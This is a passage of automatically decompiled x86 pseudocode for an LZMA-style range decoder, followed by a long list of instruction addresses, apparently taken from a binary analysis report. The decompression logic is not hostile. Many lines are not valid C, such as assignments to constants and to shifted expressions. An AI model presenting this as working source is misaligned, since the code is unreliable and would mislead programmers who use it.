								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                            0x00000000
                                                                                            0x004070ab
                                                                                            0x004070ab
                                                                                            0x004070af
                                                                                            0x00407166
                                                                                            0x00407169
                                                                                            0x00407175
                                                                                            0x00407056
                                                                                            0x00407056
                                                                                            0x00407059
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x004073ce
                                                                                            0x004073ce
                                                                                            0x004073d4
                                                                                            0x004073da
                                                                                            0x004073e0
                                                                                            0x004073fa
                                                                                            0x004073fd
                                                                                            0x00407403
                                                                                            0x0040740e
                                                                                            0x00407410
                                                                                            0x004073e2
                                                                                            0x004073e2
                                                                                            0x004073f1
                                                                                            0x004073f5
                                                                                            0x004073f5
                                                                                            0x0040741a
                                                                                            0x00407441
                                                                                            0x00407441
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x0040741c
                                                                                            0x0040741c
                                                                                            0x00407420
                                                                                            0x004075cf
                                                                                            0x00000000
                                                                                            0x004075cf
                                                                                            0x0040742c
                                                                                            0x00407433
                                                                                            0x0040743b
                                                                                            0x0040743e
                                                                                            0x00000000
                                                                                            0x0040743e
                                                                                            0x004070b5
                                                                                            0x004070b9
                                                                                            0x004075fa
                                                                                            0x004075fa
                                                                                            0x004075fd
                                                                                            0x00407601
                                                                                            0x00407601
                                                                                            0x004070bf
                                                                                            0x004070c5
                                                                                            0x004070c8
                                                                                            0x004070cc
                                                                                            0x004070cf
                                                                                            0x004070d3
                                                                                            0x00407599
                                                                                            0x004075e5
                                                                                            0x004075ed
                                                                                            0x004075f4
                                                                                            0x004075f6
                                                                                            0x00000000
                                                                                            0x004075f6
                                                                                            0x004070d9
                                                                                            0x004070dc
                                                                                            0x004070e2
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e7
                                                                                            0x004070ea
                                                                                            0x004070ed
                                                                                            0x004070f0
                                                                                            0x004070f3
                                                                                            0x004070f6
                                                                                            0x004070f7
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070fc
                                                                                            0x004070ff
                                                                                            0x00407102
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407108
                                                                                            0x0040710a
                                                                                            0x0040710a
                                                                                            0x0040710d
                                                                                            0x0040710d
                                                                                            0x0040710d
                                                                                            0x00406be3
                                                                                            0x00406be3
                                                                                            0x00406bec
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2
                                                                                            0x00000000
                                                                                            0x00406bfd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c06
                                                                                            0x00406c09
                                                                                            0x00406c0c
                                                                                            0x00406c10
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c16
                                                                                            0x00406c19
                                                                                            0x00406c1b
                                                                                            0x00406c1c
                                                                                            0x00406c1f
                                                                                            0x00406c21
                                                                                            0x00406c22
                                                                                            0x00406c24
                                                                                            0x00406c27
                                                                                            0x00406c2c
                                                                                            0x00406c31
                                                                                            0x00406c3a
                                                                                            0x00406c4d
                                                                                            0x00406c50
                                                                                            0x00406c5c
                                                                                            0x00406c84
                                                                                            0x00406c86
                                                                                            0x00406c94
                                                                                            0x00406c94
                                                                                            0x00406c98
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c88
                                                                                            0x00406c88
                                                                                            0x00406c8b
                                                                                            0x00406c8c
                                                                                            0x00406c8c
                                                                                            0x00000000
                                                                                            0x00406c88
                                                                                            0x00406c62
                                                                                            0x00406c67
                                                                                            0x00406c67
                                                                                            0x00406c70
                                                                                            0x00406c78
                                                                                            0x00406c7b
                                                                                            0x00000000
                                                                                            0x00406c81
                                                                                            0x00406c81
                                                                                            0x00000000
                                                                                            0x00406c81
                                                                                            0x00000000
                                                                                            0x00406c9e
                                                                                            0x00406c9e
                                                                                            0x00406ca2
                                                                                            0x0040754e
                                                                                            0x00000000
                                                                                            0x0040754e
                                                                                            0x00406cab
                                                                                            0x00406cbb
                                                                                            0x00406cbe
                                                                                            0x00406cc1
                                                                                            0x00406cc1
                                                                                            0x00406cc1
                                                                                            0x00406cc4
                                                                                            0x00406cc8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406cca
                                                                                            0x00406cd0
                                                                                            0x00406cfa
                                                                                            0x00406d00
                                                                                            0x00406d07
                                                                                            0x00000000
                                                                                            0x00406d07
                                                                                            0x00406cd6
                                                                                            0x00406cd9
                                                                                            0x00406cde
                                                                                            0x00406cde
                                                                                            0x00406ce9
                                                                                            0x00406cf1
                                                                                            0x00406cf4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d39
                                                                                            0x00406d3f
                                                                                            0x00406d42
                                                                                            0x00406d4f
                                                                                            0x00406d57
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d0e
                                                                                            0x00406d0e
                                                                                            0x00406d12
                                                                                            0x0040755d
                                                                                            0x00000000
                                                                                            0x0040755d
                                                                                            0x00406d1e
                                                                                            0x00406d29
                                                                                            0x00406d29
                                                                                            0x00406d29
                                                                                            0x00406d2c
                                                                                            0x00406d2f
                                                                                            0x00406d32
                                                                                            0x00406d37
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d5f
                                                                                            0x00406d61
                                                                                            0x00406d64
                                                                                            0x00406dd5
                                                                                            0x00406dd8
                                                                                            0x00406ddb
                                                                                            0x00406de2
                                                                                            0x00406dec
                                                                                            0x00000000
                                                                                            0x00406dec
                                                                                            0x00406d66
                                                                                            0x00406d6a
                                                                                            0x00406d6d
                                                                                            0x00406d6f
                                                                                            0x00406d72
                                                                                            0x00406d75
                                                                                            0x00406d77
                                                                                            0x00406d7a
                                                                                            0x00406d7c
                                                                                            0x00406d81
                                                                                            0x00406d84
                                                                                            0x00406d87
                                                                                            0x00406d8b
                                                                                            0x00406d92
                                                                                            0x00406d95
                                                                                            0x00406d9c
                                                                                            0x00406da0
                                                                                            0x00406da8
                                                                                            0x00406da8
                                                                                            0x00406da8
                                                                                            0x00406da2
                                                                                            0x00406da2
                                                                                            0x00406da2
                                                                                            0x00406d97
                                                                                            0x00406d97
                                                                                            0x00406d97
                                                                                            0x00406dac
                                                                                            0x00406daf
                                                                                            0x00406dcd
                                                                                            0x00406dcf
                                                                                            0x00000000
                                                                                            0x00406db1
                                                                                            0x00406db1
                                                                                            0x00406db4
                                                                                            0x00406db7
                                                                                            0x00406dba
                                                                                            0x00406dbc
                                                                                            0x00406dbc
                                                                                            0x00406dbc
                                                                                            0x00406dbf
                                                                                            0x00406dc2
                                                                                            0x00406dc4
                                                                                            0x00406dc5
                                                                                            0x00406dc8
                                                                                            0x00000000
                                                                                            0x00406dc8
                                                                                            0x00000000
                                                                                            0x00406ffe
                                                                                            0x00407002
                                                                                            0x00407020
                                                                                            0x00407023
                                                                                            0x0040702a
                                                                                            0x0040702d
                                                                                            0x00407030
                                                                                            0x00407033
                                                                                            0x00407036
                                                                                            0x00407039
                                                                                            0x0040703b
                                                                                            0x00407042
                                                                                            0x00407043
                                                                                            0x00407045
                                                                                            0x00407048
                                                                                            0x0040704b
                                                                                            0x0040704e
                                                                                            0x0040704e
                                                                                            0x00407053
                                                                                            0x00000000
                                                                                            0x00407053
                                                                                            0x00407004
                                                                                            0x00407007
                                                                                            0x0040700a
                                                                                            0x00407014
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407068
                                                                                            0x0040706c
                                                                                            0x0040708f
                                                                                            0x00407092
                                                                                            0x00407095
                                                                                            0x0040709f
                                                                                            0x0040706e
                                                                                            0x0040706e
                                                                                            0x00407071
                                                                                            0x00407074
                                                                                            0x00407077
                                                                                            0x00407084
                                                                                            0x00407087
                                                                                            0x00407087
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040711c
                                                                                            0x00407120
                                                                                            0x00407127
                                                                                            0x0040712a
                                                                                            0x0040712d
                                                                                            0x00407137
                                                                                            0x00000000
                                                                                            0x00407137
                                                                                            0x00407122
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407143
                                                                                            0x00407147
                                                                                            0x0040714e
                                                                                            0x00407151
                                                                                            0x00407154
                                                                                            0x00407149
                                                                                            0x00407149
                                                                                            0x00407149
                                                                                            0x00407157
                                                                                            0x0040715a
                                                                                            0x0040715d
                                                                                            0x0040715d
                                                                                            0x00407160
                                                                                            0x00407163
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407203
                                                                                            0x00407203
                                                                                            0x00407207
                                                                                            0x004075a5
                                                                                            0x00000000
                                                                                            0x004075a5
                                                                                            0x0040720d
                                                                                            0x00407210
                                                                                            0x00407213
                                                                                            0x00407217
                                                                                            0x0040721a
                                                                                            0x00407220
                                                                                            0x00407222
                                                                                            0x00407222
                                                                                            0x00407222
                                                                                            0x00407225
                                                                                            0x00407228
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406df8
                                                                                            0x00406df8
                                                                                            0x00406dfc
                                                                                            0x00407569
                                                                                            0x00000000
                                                                                            0x00407569
                                                                                            0x00406e02
                                                                                            0x00406e05
                                                                                            0x00406e08
                                                                                            0x00406e0c
                                                                                            0x00406e0f
                                                                                            0x00406e15
                                                                                            0x00406e17
                                                                                            0x00406e17
                                                                                            0x00406e17
                                                                                            0x00406e1a
                                                                                            0x00406e1d
                                                                                            0x00406e1d
                                                                                            0x00406e20
                                                                                            0x00406e23
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406e29
                                                                                            0x00406e2f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406e35
                                                                                            0x00406e35
                                                                                            0x00406e39
                                                                                            0x00406e3c
                                                                                            0x00406e3f
                                                                                            0x00406e42
                                                                                            0x00406e45
                                                                                            0x00406e46
                                                                                            0x00406e49
                                                                                            0x00406e4b
                                                                                            0x00406e51
                                                                                            0x00406e54
                                                                                            0x00406e57
                                                                                            0x00406e5a
                                                                                            0x00406e5d
                                                                                            0x00406e60
                                                                                            0x00406e63
                                                                                            0x00406e7f
                                                                                            0x00406e82
                                                                                            0x00406e85
                                                                                            0x00406e88
                                                                                            0x00406e8f
                                                                                            0x00406e93
                                                                                            0x00406e95
                                                                                            0x00406e99
                                                                                            0x00406e65
                                                                                            0x00406e65
                                                                                            0x00406e69
                                                                                            0x00406e71
                                                                                            0x00406e76
                                                                                            0x00406e78
                                                                                            0x00406e7a
                                                                                            0x00406e7a
                                                                                            0x00406e9c
                                                                                            0x00406ea3
                                                                                            0x00406ea6
                                                                                            0x00000000
                                                                                            0x00406eac
                                                                                            0x00000000
                                                                                            0x00406eac
                                                                                            0x00000000
                                                                                            0x00406eb1
                                                                                            0x00406eb1
                                                                                            0x00406eb5
                                                                                            0x00407575
                                                                                            0x00000000
                                                                                            0x00407575
                                                                                            0x00406ebb
                                                                                            0x00406ebe
                                                                                            0x00406ec1
                                                                                            0x00406ec5
                                                                                            0x00406ec8
                                                                                            0x00406ece
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed3
                                                                                            0x00406ed6
                                                                                            0x00406ed6
                                                                                            0x00406ed6
                                                                                            0x00406edc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406ede
                                                                                            0x00406ee1
                                                                                            0x00406ee4
                                                                                            0x00406ee7
                                                                                            0x00406eea
                                                                                            0x00406eed
                                                                                            0x00406ef0
                                                                                            0x00406ef3
                                                                                            0x00406ef6
                                                                                            0x00406ef9
                                                                                            0x00406efc
                                                                                            0x00406f14
                                                                                            0x00406f17
                                                                                            0x00406f1a
                                                                                            0x00406f1d
                                                                                            0x00406f1d
                                                                                            0x00406f20
                                                                                            0x00406f24
                                                                                            0x00406f26
                                                                                            0x00406efe
                                                                                            0x00406efe
                                                                                            0x00406f06
                                                                                            0x00406f0b
                                                                                            0x00406f0d
                                                                                            0x00406f0f
                                                                                            0x00406f0f
                                                                                            0x00406f29
                                                                                            0x00406f30
                                                                                            0x00406f33
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00406f33
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f75
                                                                                            0x00406f75
